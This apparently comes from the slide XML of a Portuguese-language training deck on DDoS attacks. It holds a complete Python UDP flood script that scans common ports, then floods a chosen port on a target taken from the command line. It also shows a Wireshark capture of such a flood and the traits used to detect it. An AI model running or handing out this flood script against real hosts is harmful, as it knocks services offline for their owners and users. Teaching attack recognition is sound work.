            <a:off x="8429541" y="2657475"/>
            <a:ext cx="58587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Python 3.x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="2957513"/>
            <a:ext cx="5281519" cy="1411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#!/usr/bin/env python3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Exemplo educacional de um ataque UDP Flood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APENAS PARA FINS EDUCACIONAIS - NÃO USE EM SISTEMAS REAIS SEM AUTORIZAÇÃO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"""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socket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random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sys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time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udp_flood(target_ip, target_port, packet_size=1024, count=1000):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Demonstração de um ataque UDP Flood simples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print(f"[*] Iniciando demonstração de UDP Flood para {target_ip}:{target_port}")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print("[*] Pressione Ctrl+C para interromper")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Cria um socket UDP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sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)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Dados aleatórios para o payload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bytes_data = random._urandom(packet_size)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sent = 0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for i in range(count):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Envia pacote UDP com dados aleatórios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sock.sendto(bytes_data, (target_ip, target_port))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sent += 1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Status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if sent % 100 == 0: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print(f"[+] Enviados {sent} pacotes UDP de {packet_size} bytes")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Pequena pausa para não sobrecarregar o sistema local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time.sleep(0.01)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KeyboardInterrupt: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print("\n[*] Demonstração interrompida pelo usuário")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Exception as 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print(f"[!] Erro: {e}")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finally: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print(f"[*] Total de pacotes enviados: {sent}")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sock.close()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def scan_and_flood(target_ip, port_range=(1, 65535), packet_size=1024):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Escaneia portas e realiza UDP flood em portas fechadas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"""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print(f"[*] Escaneando portas UDP em {target_ip}")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Portas comuns para testar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test_ports = [53, 123, 161, 1900, 5353, 11211]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closed_ports = []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Testa algumas portas comuns primeiro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for port in test_ports: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try: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sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)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sock.settimeout(1)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# Envia pacote UDP vazio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sock.sendto(b'', (target_ip, port))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# Tenta receber resposta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try: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data, addr = sock.recvfrom(1024)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print(f"[+] Porta {port}: aberta (resposta recebida)")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except socket.timeout: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print(f"[+] Porta {port}: possivelmente aberta (sem resposta)")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except socket.error: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print(f"[+] Porta {port}: fechada (ICMP unreachable)")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closed_ports.append(port)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finally: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sock.close()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if closed_ports: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Seleciona uma porta fechada aleatória para o flood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target_port = random.choice(closed_ports)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print(f"[*] Selecionando porta fechada para demonstração: {target_port}")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udp_flood(target_ip, target_port, packet_size)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else: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# Usa uma porta aleatória se não encontrou portas fechadas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target_port = random.randint(10000, 65000)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print(f"[*] Usando porta aleatória para demonstração: {target_port}")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udp_flood(target_ip, target_port, packet_size)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KeyboardInterrupt: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print("\n[*] Demonstração interrompida pelo usuário")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except Exception as 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print(f"[!] Erro: {e}")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pP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if __name__ == "__main__":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if len(sys.argv) &lt; 2 or len(sys.argv) &gt; 4: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print(f"Uso: {sys.argv[0]}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="16959263"/>
            <a:ext cx="4501316" cy="225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[porta] [tamanho_pacote]")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print("Exemplo: python3 udp_flood_example.py 192.168.1.100 53 512")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sys.exit(1)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target = sys.argv[1]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if len(sys.argv) &gt;= 3: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port = int(sys.argv[2])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if len(sys.argv) == 4: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size = int(sys.argv[3])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udp_flood(target, port, size)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else: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udp_flood(target, port)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else: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# Se não especificar porta, escaneia e escolhe automaticamente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scan_and_flood(target)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="5114925"/>
            <a:ext cx="4286250" cy="100012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45" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="5114925"/>
            <a:ext cx="28575" cy="100012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46" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="5200650"/>
            <a:ext cx="4186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Características do UDP Flood:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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5389959"/>
            <a:ext cx="50006" cy="100013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936331" y="5386388"/>
            <a:ext cx="277677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 sockets UDP padrão (não requer privilégios de admin)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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5561409"/>
            <a:ext cx="50006" cy="100013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4936331" y="5557838"/>
            <a:ext cx="214513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Envia dados aleatórios para portas específicas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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5732859"/>
            <a:ext cx="50006" cy="100013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4936331" y="5729288"/>
            <a:ext cx="255090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Pode escanear portas fechadas para maximizar o efeito</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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5904309"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936331" y="5900738"/>
            <a:ext cx="250656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Tamanho do pacote configurável para ajustar o volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800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56" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="6486525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57" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="6486525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8/14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37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471488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0D1C33">
              <a:alpha val="7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457200"/>
            <a:ext cx="9144000" cy="14288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14300"/>
            <a:ext cx="3177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Anatomia Avançada de Ataques DDoS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58958" y="157163"/>
            <a:ext cx="17707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 de Cibersegurança</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="742950"/>
            <a:ext cx="8643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Exemplo Prático: Análise de Tráfego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285750" y="1085850"/>
            <a:ext cx="8643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Identificando padrões de ataque com ferramentas de análise de pacotes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285750" y="1457325"/>
            <a:ext cx="8572500" cy="571500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1457325"/>
            <a:ext cx="28575" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA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573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57225" y="1571625"/>
            <a:ext cx="81581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análise de tráfego é essencial para identificar, compreender e mitigar ataques DDoS. Ferramentas como o Wireshark permitem visualizar os padrões de tráfego malicioso e suas características.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285750" y="220027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de um UDP Flood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285750" y="2514600"/>
            <a:ext cx="4200525" cy="1735931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285750" y="2514600"/>
            <a:ext cx="4200525" cy="292894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="263C5A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="2800350"/>
            <a:ext cx="4200525" cy="7144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7" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="2571750"/>
            <a:ext cx="164468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Wireshark: Captura UDP Flood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047967" y="2600325"/>
            <a:ext cx="45259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Filtro: udp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="2900363"/>
            <a:ext cx="3571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No.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="2900363"/>
            <a:ext cx="642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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214438" y="2900363"/>
            <a:ext cx="10001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Source</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2143125" y="2900363"/>
            <a:ext cx="10001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Destination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3071813" y="2900363"/>
            <a:ext cx="5000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Proto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3500438" y="2900363"/>
            <a:ext cx="9858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Info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357188" y="3107531"/>
            <a:ext cx="3499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788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635654" y="3107531"/>
            <a:ext cx="628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0.000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192588" y="3107531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28" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2097611" y="3107531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3002635" y="3107531"/>
            <a:ext cx="48915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788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420349" y="3107531"/>
            <a:ext cx="10659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53424 → 53 Len=1024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357188" y="3457575"/>
            <a:ext cx="3499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788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635654" y="3457575"/>
            <a:ext cx="628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0.000132</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192588" y="3457575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2097611" y="3457575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3002635" y="3457575"/>
            <a:ext cx="48915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788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420349" y="3457575"/>
            <a:ext cx="10659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53425 → 53 Len=1024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="3807619"/>
            <a:ext cx="3499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788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635654" y="3807619"/>
            <a:ext cx="628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0.000264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1192588" y="3807619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40" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2097611" y="3807619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41" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002635" y="3807619"/>
            <a:ext cx="48915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788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420349" y="3807619"/>
            <a:ext cx="10659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53426 → 53 Len=1024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="4157663"/>
            <a:ext cx="3499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635654" y="4157663"/>
            <a:ext cx="628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0.000398</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192588" y="4157663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2097611" y="4157663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3002635" y="4157663"/>
            <a:ext cx="48915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788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420349" y="4157663"/>
            <a:ext cx="10659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53427 → 53 Len=1024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="4507706"/>
            <a:ext cx="29975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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585508" y="4507706"/>
            <a:ext cx="52810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0.000531</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042178" y="4507706"/>
            <a:ext cx="81352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52" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784263" y="4507706"/>
            <a:ext cx="81352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53" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526348" y="4507706"/>
            <a:ext cx="41394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ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868857" y="4507706"/>
            <a:ext cx="161744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Destination unreachable (Port unreachable)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="4857750"/>
            <a:ext cx="34990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3B3E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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635654" y="4857750"/>
            <a:ext cx="628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AE6B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0.000664</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192588" y="4857750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192.168.1.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2097611" y="4857750"/>
            <a:ext cx="9764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BD38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10.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002635" y="4857750"/>
            <a:ext cx="48915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C8181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UDP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420349" y="4857750"/>
            <a:ext cx="10659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2E8F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53428 → 53 Len=1024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="4400550"/>
            <a:ext cx="4200525" cy="2757488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="99">
            <a:solidFill>
              <a:srgbClr val="3A6EA5"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4514850"/>
            <a:ext cx="4043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Detalhes do Pacote UDP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4743450"/>
            <a:ext cx="4043363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Frame 3: 1066 bytes on wire, 1066 bytes captured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Ethernet II, Src: 00:1a:2b:3c:4d:5e, Dst: 00:6f:7g:8h:9i:0j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Internet Protocol Version 4, Src: 192.168.1.10, Dst: 10.0.0.1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Version: 4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Header Length: 20 bytes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Total Length: 1052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Identification: 0x1234 (4660)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Flags: 0x00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Fragment offset: 0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Time to live: 64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Protocol: UDP (17)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Header checksum: 0x5678 [validation disabled]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Source: 192.168.1.10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Destination: 10.0.0.1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User Datagram Protocol, Src Port: 53426, Dst Port: 53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Source Port: 53426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Destination Port: 53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Length: 1032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Checksum: 0x9abc [validation disabled]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Data (1024 bytes): Random payload data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="7315200"/>
            <a:ext cx="4200525" cy="100012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65" name="Shape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="7315200"/>
            <a:ext cx="28575" cy="100012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66" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="7400925"/>
            <a:ext cx="4100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Características Observáveis:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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7590234"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478631" y="7586663"/>
            <a:ext cx="216896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Múltiplos pacotes UDP do mesmo IP de origem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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7761684"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478631" y="7758113"/>
            <a:ext cx="227288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Portas de origem incrementais (53424, 53425, ...)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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7933134"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478631" y="7929563"/>
            <a:ext cx="216740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Tamanho consistente dos pacotes (1024 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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8104584"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478631" y="8101013"/>
            <a:ext cx="203077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Respostas ICMP "Port unreachable" do alvo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="220027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Ferramentas de Análise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="2514600"/>
            <a:ext cx="2043113" cy="11858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77" name="Shape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="2628900"/>
            <a:ext cx="114300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sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4943475" y="2686050"/>
            <a:ext cx="6231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Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="3000375"/>
            <a:ext cx="18859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Analisador de protocolos de rede que permite capturar e examinar pacotes em tempo real. Ideal para análise detalhada de tráfego.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="2514600"/>
            <a:ext cx="2043113" cy="1185863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81" name="Shape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="2628900"/>
            <a:ext cx="242888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8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588" y="2711053"/>
            <a:ext cx="128588" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7229475" y="2686050"/>
            <a:ext cx="5539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tcpdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Text 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
